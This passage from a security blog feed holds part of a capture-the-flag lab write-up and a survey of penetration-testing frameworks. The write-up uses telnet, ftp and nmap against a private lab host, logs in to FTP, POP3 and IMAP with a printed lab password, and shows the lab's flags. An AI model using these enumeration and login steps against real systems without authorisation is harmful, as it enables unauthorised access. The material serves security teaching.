<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">GET /flag.thm HTTP/1.1</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">host: telnet</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">HTTP/1.1 200 OK</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Content-Type: application/octet-stream</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Content-Length: 39</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">THM{e3eb0a1df437f3f97a64aca5952c8ea0}</span><br></span></code></pre></div></div>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="ftp-port-21--data-retrieval">FTP (Port 21) — Data Retrieval<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#ftp-port-21--data-retrieval" class="hash-link" aria-label="Direct link to FTP (Port 21) — Data Retrieval" title="Direct link to FTP (Port 21) — Data Retrieval" translate="no">​</a></h2>
<p>File Transfer Protocol (FTP) remains a common vector for sensitive data exposure if misconfigured. Interacting with port 21 exposed a standard vsFTPd 3.0.5 daemon.</p>
<p>Using the local FTP client utility, a session was established using known user credentials (<code>frank</code>).</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ ftp 10.49.179.14</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">220 (vsFTPd 3.0.5)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Name (10.49.179.14:localuser): frank</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">331 Please specify the password.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Password:</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">230 Login successful.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Remote system type is UNIX.</span><br></span></code></pre></div></div>
<p>Upon successful authentication, the server transitioned to passive mode (<code>227 Entering Passive Mode</code>) to establish a separate data channel for directory listings and file transfers. A directory listing exposed a target backup text document and an explicit data file:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">ftp&gt; ls</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">150 Here comes the directory listing.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">drwx------   10 1001     1001         4096 Sep 15 2021 Maildir</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">-rw-rw-r--    1 1001     1001         4006 Sep 15 2021 README.txt</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">-rw-rw-r--    1 1001     1001           39 Sep 15 2021 ftp_flag.thm</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">226 Directory send OK.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">ftp&gt; get ftp_flag.thm</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">local: ftp_flag.thm remote: ftp_flag.thm</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">150 Opening BINARY mode data connection for ftp_flag.thm (39 bytes).</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">226 Transfer complete.</span><br></span></code></pre></div></div>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="smtp-port-25--banner-grabbing">SMTP (Port 25) — Banner Grabbing<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#smtp-port-25--banner-grabbing" class="hash-link" aria-label="Direct link to SMTP (Port 25) — Banner Grabbing" title="Direct link to SMTP (Port 25) — Banner Grabbing" translate="no">​</a></h2>
<p>Simple Mail Transfer Protocol (SMTP) often leaks critical system configuration metrics via its initialization banner. Connecting to the raw mail submission port immediately triggered an unauthenticated information disclosure.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ telnet 10.49.179.14 25</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Trying 10.49.179.14...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Escape character is '^]'.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">220 bento.localdomain ESMTP Postfix THM{5b31ddfc0c11d81eba776e983c35e9b5}</span><br></span></code></pre></div></div>
<p>The Postfix daemon leaked both the internal hostname (<code>bento.localdomain</code>) and an embedded system string directly inside the cleartext <code>220</code> service readiness banner before any SMTP transaction commands (<code>HELO</code>, <code>EHLO</code>) were issued.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="pop3-port-110--mailstore-authentication">POP3 (Port 110) — Mailstore Authentication<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#pop3-port-110--mailstore-authentication" class="hash-link" aria-label="Direct link to POP3 (Port 110) — Mailstore Authentication" title="Direct link to POP3 (Port 110) — Mailstore Authentication" translate="no">​</a></h2>
<p>The Post Office Protocol version 3 (POP3) handles standard cleartext mailbox retrieval. Utilizing credentials harvested during reconnaissance, a direct authentication sequence was executed over port 110.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ telnet 10.49.179.14 110</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Trying 10.49.179.14...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">+OK Hello there.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">USER frank</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">+OK Password required.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">PASS D2xc9CgD</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">+OK logged in.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">STAT</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">+OK 0 0</span><br></span></code></pre></div></div>
<p>The server acknowledged authentication via <code>+OK logged in</code>. Executing the <code>STAT</code> command revealed that while the account context was fully valid, the specific POP3 drop directory contained zero active messages (<code>+OK 0 0</code>), prompting a pivot to more advanced mail handling frameworks.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="imap-port-143--interactive-mail-inspection">IMAP (Port 143) — Interactive Mail Inspection<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#imap-port-143--interactive-mail-inspection" class="hash-link" aria-label="Direct link to IMAP (Port 143) — Interactive Mail Inspection" title="Direct link to IMAP (Port 143) — Interactive Mail Inspection" translate="no">​</a></h2>
<p>Internet Message Access Protocol (IMAP) provides a more complex command structure than POP3 for mailbox management. Sessions require explicit command tags (<code>c1</code>, <code>c2</code>, etc.) prepended to each instruction line.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ telnet 10.49.179.14 143</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* OK Courier-IMAP ready.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">c1 LOGIN frank D2xc9CgD</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* OK [ALERT] Filesystem notification initialization error</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">c1 OK LOGIN Ok.</span><br></span></code></pre></div></div>
<p>Following successful authentication, directory structures were enumerated using wildcard filters to identify mail storage structures within the file system:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">c2 LIST "" "*"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* LIST (\HasNoChildren) "." "INBOX.Trash"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* LIST (\HasNoChildren) "." "INBOX.Drafts"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* LIST (\HasNoChildren) "." "INBOX.Templates"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* LIST (\HasNoChildren) "." "INBOX.Sent"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* LIST (\Unmarked \HasChildren) "." "INBOX"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">c2 OK LIST completed</span><br></span></code></pre></div></div>
<p>The primary mailbox partition was then inspected in a non-destructive, read-only state using the <code>EXAMINE</code> verb:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">c3 EXAMINE INBOX</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* FLAGS (\Draft \Answered \Flagged \Deleted \Seen \Recent)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* OK [PERMANENTFLAGS ()] No permanent flags permitted</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* 0 EXISTS</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* 0 RECENT</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">c3 OK [READ-ONLY] Ok</span><br></span></code></pre></div></div>
<hr>
<h1>2. Automated Service Verification via Nmap</h1>
<p>To compare manual assessment techniques against automated tools, an aggressive network service scan was executed using the Nmap Scripting Engine (NSE) to interrogate the exact same port array.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">nmap -sV -sC -p 21,25,80,110,143 10.49.179.14</span><br></span></code></pre></div></div>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="scan-output-analysis">Scan Output Analysis<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#scan-output-analysis" class="hash-link" aria-label="Direct link to Scan Output Analysis" title="Direct link to Scan Output Analysis" translate="no">​</a></h2>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">Starting Nmap 7.92 at 2026-06-03 11:22 IST</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Nmap scan report for 10.49.179.14</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Host is up (0.048s latency).</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">PORT    STATE SERVICE VERSION</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">21/tcp  open  ftp     vsftpd 3.0.5</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">25/tcp  open  smtp    Postfix smtpd</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_smtp-commands: bento.localdomain, PIPELINING, SIZE 10240000, VRFY,</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| SMTPUTF8, CHUNKING</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_ssl-date: TLS randomness does not represent time</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| ssl-cert: Subject: commonName=bento</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| Subject Alternative Name: DNS:bento</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_Not valid after: 2031-09-12T12:03:40</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">80/tcp  open  http    nginx 1.18.0 (Ubuntu)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_http-title: Welcome to my Web Server</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_http-server-header: nginx/1.18.0 (Ubuntu)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">110/tcp open  pop3    Courier pop3d</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_pop3-capabilities: UTF8(USER) TOP UIDL PIPELINING</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| LOGIN-DELAY(10) USER STLS</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| IMPLEMENTATION(Courier Mail Server)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| ssl-cert: Subject:</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| commonName=localhost/organizationName=Courier Mail Server</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_Not valid after: 2022-09-14T12:41:12</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">143/tcp open  imap    Courier Imapd (released 2018)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">|_imap-capabilities: ACL UTF8=ACCEPT</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| THREAD=ORDEREDSUBJECT completed QUOTA OK</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| THREAD=REFERENCES IDLE CAPABILITY IMAP4rev1</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| ENABLE SORT STARTTLS CHILDREN UIDPLUS</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">| NAMESPACE ACL2=UNION</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Service Info:</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Host: bento.localdomain</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">OSs: Unix, Linux</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">CPE: cpe:/o:linux:linux_kernel</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Nmap done: 1 IP address (1 host up) scanned in 20.12 seconds</span><br></span></code></pre></div></div>
<hr>
<h1>Core Architecture Findings: Manual vs Automated</h1>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="information-extraction-limitations">Information Extraction Limitations<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#information-extraction-limitations" class="hash-link" aria-label="Direct link to Information Extraction Limitations" title="Direct link to Information Extraction Limitations" translate="no">​</a></h2>
<p>While Nmap accurately performed service version fingerprinting (<code>nginx 1.18.0</code>, <code>vsFTPd 3.0.5</code>), it did not discover sensitive flag structures hidden deeper in custom application paths (such as <code>/flag.thm</code> on HTTP), nor did it attempt credentialed data extraction within the mailboxes.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="smtp-command-exposure">SMTP Command Exposure<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#smtp-command-exposure" class="hash-link" aria-label="Direct link to SMTP Command Exposure" title="Direct link to SMTP Command Exposure" translate="no">​</a></h2>
<p>Nmap's default scripts executed an <code>EHLO</code> sequence and discovered that the <code>VRFY</code> instruction is globally exposed. This indicates that the mail server allows unauthenticated clients to verify user accounts, exposing the infrastructure to automated username harvesting and brute-force staging.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="cryptographic-weaknesses">Cryptographic Weaknesses<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#cryptographic-weaknesses" class="hash-link" aria-label="Direct link to Cryptographic Weaknesses" title="Direct link to Cryptographic Weaknesses" translate="no">​</a></h2>
<p>The NSE engine extracted SSL/TLS public key infrastructure data for the mail daemons on ports 110 and 143. The script engine exposed a critical configuration finding:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">Not valid after: 2022-09-14T12:41:12</span><br></span></code></pre></div></div>
<p>The cryptographic certificates protecting authentication data over POP3/IMAP expired years prior. In an enterprise auditing scenario, this confirms a failure in certificate lifecycle management, exposing transmission lines to potential credential harvesting via Machine-in-the-Middle (MitM) attacks.</p>
<hr>
<h1>Conclusion</h1>
<p>Automated engines like Nmap are essential for broad attack-surface mapping and initial discovery. However, security professionals must remain adept at manual protocol interaction. Understanding how to communicate directly with network daemons over raw TCP streams ensures that security testers can accurately validate configurations, handle virtual host routing constraints, and uncover deep-seated vulnerabilities that automated enumeration routines frequently overlook.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Penetration Testing Frameworks]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks</guid>
            <pubDate>Tue, 02 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[When you're doing a pentest, you can't just randomly poke at things and hope something breaks. You need a structured approach — something that tells you what to test, in what order, and how to prove you tested it. That's what frameworks are. They're not rules you follow blindly; they're maps that prevent you from missing entire attack surfaces.]]></description>
            <content:encoded><![CDATA[<p>When you're doing a pentest, you can't just randomly poke at things and hope something breaks. You need a structured approach — something that tells you <em>what to test, in what order, and how to prove you tested it</em>. That's what frameworks are. They're not rules you follow blindly; they're maps that prevent you from missing entire attack surfaces.</p>
<p>There are several frameworks in active use, each born from a different philosophy. Some are academic, some are government-issued, some are built by practitioners who were tired of inconsistent engagements. Knowing which one to reach for — and why — is what separates a methodical tester from someone just running tools.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="osstmm">OSSTMM<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#osstmm" class="hash-link" aria-label="Direct link to OSSTMM" title="Direct link to OSSTMM" translate="no">​</a></h2>
<p>The Open Source Security Testing Methodology Manual. This one comes from ISECOM and it's the most <em>scientific</em> of the bunch — it treats security testing like a measurable discipline rather than an art.</p>
<p>The core idea is <strong>RAV</strong> — Risk Assessment Value. Instead of just saying "this is vulnerable," OSSTMM gives you a numerical score based on attack surface, controls in place, and actual exposure. It covers not just technical systems but also physical security, human factors, and telecommunications.</p>
<p>In practice: OSSTMM is thorough to the point of being heavy. It's more suited for formal audits than a quick web app pentest. The value is in its completeness — it forces you to think about attack surfaces you'd otherwise skip.</p>
<p>Key channels it covers: Human, Physical, Wireless, Telecommunications, Data Networks.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="owasp-wstg">OWASP WSTG<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#owasp-wstg" class="hash-link" aria-label="Direct link to OWASP WSTG" title="Direct link to OWASP WSTG" translate="no">​</a></h2>
<p>The OWASP Web Security Testing Guide. This is the one you'll actually use day-to-day if you're doing web app pentesting or bug bounty.</p>
<p>OWASP WSTG is organized around test cases — each one maps to a specific vulnerability class, has a defined objective, a testing procedure, and expected results. It covers everything from information gathering and authentication testing to business logic flaws and client-side attacks.</p>
<p>The structure:</p>
<ul>
<li class=""><strong>OTG-INFO</strong> — Recon and fingerprinting</li>
<li class=""><strong>OTG-AUTHN</strong> — Authentication mechanisms</li>
<li class=""><strong>OTG-AUTHZ</strong> — Authorization and access control</li>
<li class=""><strong>OTG-INPVAL</strong> — Input validation (SQLi, XSS, XXE, etc.)</li>
<li class=""><strong>OTG-SESS</strong> — Session management</li>
<li class=""><strong>OTG-CRYPST</strong> — Cryptography</li>
<li class=""><strong>OTG-BUSLOGIC</strong> — Business logic flaws</li>
<li class=""><strong>OTG-CLIENT</strong> — Client-side attacks</li>
</ul>
<p>This is the framework you open <em>mid-engagement</em>, not beforehand. You're testing auth bypass? Open the AUTHN section. It's a reference, not a book to read cover to cover.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="nist-sp-800-115">NIST SP 800-115<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#nist-sp-800-115" class="hash-link" aria-label="Direct link to NIST SP 800-115" title="Direct link to NIST SP 800-115" translate="no">​</a></h2>
<p>Published by the National Institute of Standards and Technology. This is the U.S. government's take on how security testing should be done — formal, phase-based, and compliance-oriented.</p>
<p>It defines four phases:</p>
<ol>
<li class=""><strong>Planning</strong> — Scope, rules of engagement, objectives</li>
<li class=""><strong>Discovery</strong> — Identifying systems, services, vulnerabilities</li>
<li class=""><strong>Attack</strong> — Exploitation and validation</li>
<li class=""><strong>Reporting</strong> — Documenting findings and remediation</li>
</ol>
<p>NIST 800-115 is less about <em>how</em> to hack and more about <em>how to run an engagement properly</em>. It's what you reference when a client asks "what methodology do you follow?" and the answer needs to satisfy a compliance requirement. The technical depth is shallow compared to OWASP or PTES, but the process rigor is high.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="ptes">PTES<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#ptes" class="hash-link" aria-label="Direct link to PTES" title="Direct link to PTES" translate="no">​</a></h2>
<p>The Penetration Testing Execution Standard. This one was built by practitioners — people who were actually doing engagements and needed a standard that reflected reality.</p>
<p>PTES has seven phases:</p>
<ol>
<li class=""><strong>Pre-engagement Interactions</strong> — Scope, contracts, legal clearance</li>
<li class=""><strong>Intelligence Gathering</strong> — OSINT, recon, target profiling</li>
<li class=""><strong>Threat Modeling</strong> — What's actually worth attacking given the target's business</li>
<li class=""><strong>Vulnerability Analysis</strong> — Identifying weaknesses</li>
<li class=""><strong>Exploitation</strong> — Actually getting in</li>
<li class=""><strong>Post-Exploitation</strong> — Persistence, lateral movement, data exfil simulation</li>
<li class=""><strong>Reporting</strong> — Findings, evidence, remediation advice</li>
</ol>
<p>What makes PTES useful is that it mirrors how real engagements work. The threat modeling phase in particular is underrated — it forces you to think from an attacker's business perspective, not just a technical one. You're asking: <em>what does this organization actually care about protecting, and what's the realistic path to compromising it?</em></p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="issaf">ISSAF<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#issaf" class="hash-link" aria-label="Direct link to ISSAF" title="Direct link to ISSAF" translate="no">​</a></h2>
<p>Information Systems Security Assessment Framework. Older, nine-phase methodology that was influential in formalizing how assessments are structured.</p>
<p>The phases: Planning → Assessment → Treatment → Accreditation → Monitoring → Detection → Response → Recovery → Review.</p>
<p>ISSAF goes beyond just "find vulnerabilities" — it extends into incident response, recovery, and ongoing monitoring. It's more of a full security program framework than a pure pentest methodology. In modern practice it's largely been superseded by PTES and NIST, but it's worth knowing it exists, especially in enterprise contexts where the client wants to see a comprehensive lifecycle, not just an attack simulation.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="mitre-attck">MITRE ATT&amp;CK<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#mitre-attck" class="hash-link" aria-label="Direct link to MITRE ATT&amp;CK" title="Direct link to MITRE ATT&amp;CK" translate="no">​</a></h2>
<p>This is different from the others — it's not a testing methodology, it's a <strong>knowledge base of adversary behavior</strong>. ATT&amp;CK catalogs real-world TTPs (Tactics, Techniques, and Procedures) observed from actual threat actors.</p>
<p>The structure:</p>
<ul>
<li class=""><strong>Tactics</strong> — The <em>why</em> (what the attacker is trying to achieve): Reconnaissance, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Impact</li>
<li class=""><strong>Techniques</strong> — The <em>how</em> (specific methods to achieve the tactic)</li>
<li class=""><strong>Sub-techniques</strong> — Granular variants of techniques</li>
<li class=""><strong>Procedures</strong> — How specific threat groups implement a technique</li>
</ul>
<p>Where ATT&amp;CK shines is in <strong>mapping your findings to real attacker behavior</strong>. Instead of just saying "we got RCE via SQLi," you can say "Initial Access via T1190 (Exploit Public-Facing Application), Execution via T1059.004 (Unix Shell)." This is meaningful to blue teams because it tells them <em>what to detect</em>, not just what was broken.</p>
<p>For bug bounty writeups and CTF reports, ATT&amp;CK mapping adds immediate credibility. For red team engagements, it's how you demonstrate that your simulation reflects realistic threat actor behavior.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="other-notable-frameworks">Other Notable Frameworks<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#other-notable-frameworks" class="hash-link" aria-label="Direct link to Other Notable Frameworks" title="Direct link to Other Notable Frameworks" translate="no">​</a></h2>
<p>A few worth knowing without going deep:</p>
<p><strong>WASC Threat Classification</strong> — Web Application Security Consortium's taxonomy of web threats. Predates OWASP WSTG, less granular, occasionally referenced in older reports.</p>
<p><strong>CSA Cloud Controls Matrix</strong> — Cloud-specific. Maps security controls across cloud service models (IaaS, PaaS, SaaS). Useful when the engagement scope includes cloud infrastructure.</p>
